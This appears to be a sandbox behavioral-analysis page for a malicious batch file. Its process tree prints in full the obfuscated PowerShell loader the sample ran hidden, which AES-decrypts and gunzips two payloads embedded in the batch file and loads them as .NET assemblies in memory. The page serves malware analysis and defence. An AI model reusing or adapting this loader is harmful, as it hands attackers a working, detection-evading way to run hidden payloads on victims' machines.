| ZeroBOX

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "EWhuIXEf" C:\Users\test22\AppData\Local\Temp\build_SC.bat

    3016
    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\build_SC.bat

      964
      • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\build_SC.bat

        2252
        • build_SC.bat.exe "C:\Users\test22\AppData\Local\Temp\build_SC.bat.exe" -w hidden -c $VWrg='Sptxljlitxljttxlj'.Replace('txlj', '');$poxH='Loadtxlj'.Replace('txlj', '');$PSUs='EntrtxljyPtxljointxljttxlj'.Replace('txlj', '');$JWKh='GettxljCutxljrretxljntPtxljrtxljocetxljsstxlj'.Replace('txlj', '');$uMOp='ChtxljangetxljExttxljenstxljiotxljntxlj'.Replace('txlj', '');$ngbA='EletxljmtxljenttxljAtxljttxlj'.Replace('txlj', '');$Idpk='MaitxljnMtxljotxljdutxljletxlj'.Replace('txlj', '');$HZsE='TrtxljantxljsftxljormtxljFitxljnaltxljBlotxljcktxlj'.Replace('txlj', '');$qaJF='FromtxljBtxljatxljsetxlj64txljStxljtrintxljgtxlj'.Replace('txlj', '');$WYHj='CtxljreatxljteDtxljecrtxljyptotxljrtxlj'.Replace('txlj', '');$Yxzl='RetxljadtxljLinetxljstxlj'.Replace('txlj', '');$XZtr='Intxljvotxljktxljetxlj'.Replace('txlj', '');function JeoHt($ELZLV){$PsSBT=[System.Security.Cryptography.Aes]::Create();$PsSBT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PsSBT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PsSBT.Key=[System.Convert]::$qaJF('ysmJpAaiNCwHWX8owtLbwDXbvqF4qqJv/N6iULJxQX4=');$PsSBT.IV=[System.Convert]::$qaJF('KkVvrh415rYbWSxbwOYxSw==');$vXLcw=$PsSBT.$WYHj();$XqKlx=$vXLcw.$HZsE($ELZLV,0,$ELZLV.Length);$vXLcw.Dispose();$PsSBT.Dispose();$XqKlx;}function vIJeV($ELZLV){$fXyGt=New-Object System.IO.MemoryStream(,$ELZLV);$vwbHF=New-Object System.IO.MemoryStream;$QVgMh=New-Object System.IO.Compression.GZipStream($fXyGt,[IO.Compression.CompressionMode]::Decompress);$QVgMh.CopyTo($vwbHF);$QVgMh.Dispose();$fXyGt.Dispose();$vwbHF.Dispose();$vwbHF.ToArray();}$BZAmP=[System.Linq.Enumerable]::$ngbA([System.IO.File]::$Yxzl([System.IO.Path]::$uMOp([System.Diagnostics.Process]::$JWKh().$Idpk.FileName, $null)), 1);$hOQTZ=$BZAmP.Substring(2).$VWrg(':');$OGRUZ=vIJeV (JeoHt ([Convert]::$qaJF($hOQTZ[0])));$aLVEO=vIJeV (JeoHt ([Convert]::$qaJF($hOQTZ[1])));[System.Reflection.Assembly]::$poxH([byte[]]$aLVEO).$PSUs.$XZtr($null,$null);[System.Reflection.Assembly]::$poxH([byte[]]$OGRUZ).$PSUs.$XZtr($null,$null);

          2412

Process contents

No process loaded Click on a process in the tree above to load its data.